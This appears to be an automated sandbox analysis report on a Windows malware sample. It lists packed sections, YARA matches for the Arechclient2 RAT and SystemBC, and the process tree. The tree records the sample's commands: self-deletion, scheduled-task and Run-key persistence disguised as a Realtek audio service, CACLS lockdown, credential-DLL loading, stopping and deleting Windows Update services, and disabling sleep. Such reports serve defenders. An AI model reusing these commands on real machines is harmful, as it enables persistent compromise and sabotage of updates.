Source: gntuud.exe.4.dr	Static PE information: section name: Fh?jG[OJ
Source: gntuud.exe.4.dr	Static PE information: section name: qNR5:WbS
Source: gntuud.exe.4.dr	Static PE information: section name: z?fd8ijJ
Source: gntuud.exe.4.dr	Static PE information: section name: CV?7x>JO
Source: gntuud.exe.4.dr	Static PE information: section name: dT<:EHzj
Source: gntuud.exe.4.dr	Static PE information: section name: @]topACL
Source: syncfiles[1].dll.13.dr	Static PE information: section name: *;>%1sXO
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 7rP!Ni:j
Source: syncfiles[1].dll.13.dr	Static PE information: section name: bkE<E2?8
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 8*7`Joyq
Source: syncfiles[1].dll.13.dr	Static PE information: section name: 0Ys'"rSd
Source: syncfiles[1].dll.13.dr	Static PE information: section name: $u!6XeN&
Source: syncfiles[1].dll.13.dr	Static PE information: section name: K)'tLNvc
Source: syncfiles.dll.13.dr	Static PE information: section name: *;>%1sXO
Source: syncfiles.dll.13.dr	Static PE information: section name: 7rP!Ni:j
Source: syncfiles.dll.13.dr	Static PE information: section name: bkE<E2?8
Source: syncfiles.dll.13.dr	Static PE information: section name: 8*7`Joyq
Source: syncfiles.dll.13.dr	Static PE information: section name: 0Ys'"rSd
Source: syncfiles.dll.13.dr	Static PE information: section name: $u!6XeN&
Source: syncfiles.dll.13.dr	Static PE information: section name: K)'tLNvc
Source: cred64[1].dll.13.dr	Static PE information: section name: f5g\gWe7
Source: cred64[1].dll.13.dr	Static PE information: section name: zDthL)*@
Source: cred64[1].dll.13.dr	Static PE information: section name: nb"h!m#Y
Source: cred64[1].dll.13.dr	Static PE information: section name: $^+<%+dU
Source: cred64[1].dll.13.dr	Static PE information: section name: Z-),j99t
Source: cred64[1].dll.13.dr	Static PE information: section name: 8"ikKHD[
Source: cred64[1].dll.13.dr	Static PE information: section name: k&l<0?<6
Source: cred64[1].dll.13.dr	Static PE information: section name: n[uZh3ex
Source: cred64[1].dll.13.dr	Static PE information: section name: Uh%r6i!H
Source: cred64.dll.13.dr	Static PE information: section name: f5g\gWe7
Source: cred64.dll.13.dr	Static PE information: section name: zDthL)*@
Source: cred64.dll.13.dr	Static PE information: section name: nb"h!m#Y
Source: cred64.dll.13.dr	Static PE information: section name: $^+<%+dU
Source: cred64.dll.13.dr	Static PE information: section name: Z-),j99t
Source: cred64.dll.13.dr	Static PE information: section name: 8"ikKHD[
Source: cred64.dll.13.dr	Static PE information: section name: k&l<0?<6
Source: cred64.dll.13.dr	Static PE information: section name: n[uZh3ex
Source: cred64.dll.13.dr	Static PE information: section name: Uh%r6i!H
Source: Emit64[1].exe.13.dr	Static PE information: section name: 87*qGv;7
Source: Emit64[1].exe.13.dr	Static PE information: section name: ^NsFAbb[
Source: Emit64[1].exe.13.dr	Static PE information: section name: 4.ps1S["
Source: Emit64[1].exe.13.dr	Static PE information: section name: l^D/X#s1
Source: Emit64[1].exe.13.dr	Static PE information: section name: aAyXB94]
Source: Emit64[1].exe.13.dr	Static PE information: section name: 7u=]29J1
Source: Emit64[1].exe.13.dr	Static PE information: section name: *<5LK<h`
Source: Emit64[1].exe.13.dr	Static PE information: section name: Ug$Va';z
Source: Emit64[1].exe.13.dr	Static PE information: section name: dA:<*dF(
Source: Emit64[1].exe.13.dr	Static PE information: section name: r,Ht]nHV
Source: Emit64[1].exe.13.dr	Static PE information: section name: m$m2M1,9
Source: Emit64[1].exe.13.dr	Static PE information: section name: o?%]P5Wl
Source: Emit64[1].exe.13.dr	Static PE information: section name: lNMkoK?T
Source: Emit64.exe.13.dr	Static PE information: section name: 87*qGv;7
Source: Emit64.exe.13.dr	Static PE information: section name: ^NsFAbb[
Source: Emit64.exe.13.dr	Static PE information: section name: 4.ps1S["
Source: Emit64.exe.13.dr	Static PE information: section name: l^D/X#s1
Source: Emit64.exe.13.dr	Static PE information: section name: aAyXB94]
Source: Emit64.exe.13.dr	Static PE information: section name: 7u=]29J1
Source: Emit64.exe.13.dr	Static PE information: section name: *<5LK<h`
Source: Emit64.exe.13.dr	Static PE information: section name: Ug$Va';z
Source: Emit64.exe.13.dr	Static PE information: section name: dA:<*dF(
Source: Emit64.exe.13.dr	Static PE information: section name: r,Ht]nHV
Source: Emit64.exe.13.dr	Static PE information: section name: m$m2M1,9
Source: Emit64.exe.13.dr	Static PE information: section name: o?%]P5Wl
Source: Emit64.exe.13.dr	Static PE information: section name: lNMkoK?T
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 87*qGv;7
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: ^NsFAbb[
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 4.ps1S["
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: l^D/X#s1
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: aAyXB94]
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: 7u=]29J1
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: *<5LK<h`
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: Ug$Va';z
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: dA:<*dF(
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: r,Ht]nHV
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: m$m2M1,9
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: o?%]P5Wl
Source: RtkAudUService64.exe.26.dr	Static PE information: section name: lNMkoK?T

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Detected potential crypto function

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61EAD2AC	0_2_61EAD2AC
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E4B8A1	0_2_61E4B8A1
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E8D0B6	0_2_61E8D0B6
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E15337	0_2_61E15337
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E5023C	0_2_61E5023C
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E19208	0_2_61E19208
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E534E3	0_2_61E534E3
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E18736	0_2_61E18736
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E10856	0_2_61E10856
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E21816	0_2_61E21816
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E55BD7	0_2_61E55BD7
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E95D7A	0_2_61E95D7A
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E25FA2	0_2_61E25FA2
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E52F80	0_2_61E52F80
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E4CEF9	0_2_61E4CEF9
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E1EEFF	0_2_61E1EEFF
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E1DEC2	0_2_61E1DEC2

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

PE file contains more sections than normal

Source: RtkAudUService64.exe.26.dr	Static PE information: Number of sections : 14 > 10
Source: Emit64[1].exe.13.dr	Static PE information: Number of sections : 14 > 10
Source: avicapn32[1].exe.13.dr	Static PE information: Number of sections : 11 > 10
Source: avicapn32.exe.13.dr	Static PE information: Number of sections : 11 > 10
Source: Emit64.exe.13.dr	Static PE information: Number of sections : 14 > 10

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\61312899942613011832.exe 682ABD62B6E3C0E8CA57F079CD96F2D3848752EAF7002BDF57BFB512BD242811

Uses 32bit PE files

Source: DQxttu2Qrr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0000002C.00000002.809371970.0000000010005000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR	Matched rule: EXT_MAL_SystemBC_Mar22_1 date = 2022-03-11, hash1 = c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5, author = Thomas Barabosch, Deutsche Telekom Security, description = Detects unpacked SystemBC module as used by Emotet in March 2022, score = https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc, reference2 = https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6, reference = https://twitter.com/Cryptolaemus1/status/1502069552246575105
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED	Matched rule: SUSP_Two_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 2 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED	Matched rule: SUSP_Four_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 4 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings

PE file contains executable resources (Code or Archives)

Source: jekppnay.tmp.26.dr

Static PE information: Resource name: EXE type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows

Sample file is different than original file name gathered from version info

Source: DQxttu2Qrr.exe, 00000000.00000000.249003658.0000000001BD0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNamedPipeClientLib.dllF vs DQxttu2Qrr.exe
Source: DQxttu2Qrr.exe	Binary or memory string: OriginalFilenameNamedPipeClientLib.dllF vs DQxttu2Qrr.exe

PE / OLE file has an invalid certificate

Source: DQxttu2Qrr.exe

Static PE information: invalid certificate

Source: umciavi64[1].exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: umciavi64.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: avicapn32[1].exe.13.dr	Static PE information: Section: .idata ZLIB complexity 1.0029296875
Source: avicapn32[1].exe.13.dr	Static PE information: Section: .n3DK0 ZLIB complexity 0.9937564036885246
Source: avicapn32.exe.13.dr	Static PE information: Section: .idata ZLIB complexity 1.0029296875
Source: avicapn32.exe.13.dr	Static PE information: Section: .n3DK0 ZLIB complexity 0.9937564036885246

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.adwa.spyw.evad.winEXE@83/38@0/9

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: DQxttu2Qrr.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DQxttu2Qrr.exe C:\Users\user\Desktop\DQxttu2Qrr.exe
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\ProgramData\61312899942613011832.exe	Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' }
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: unknown unknown
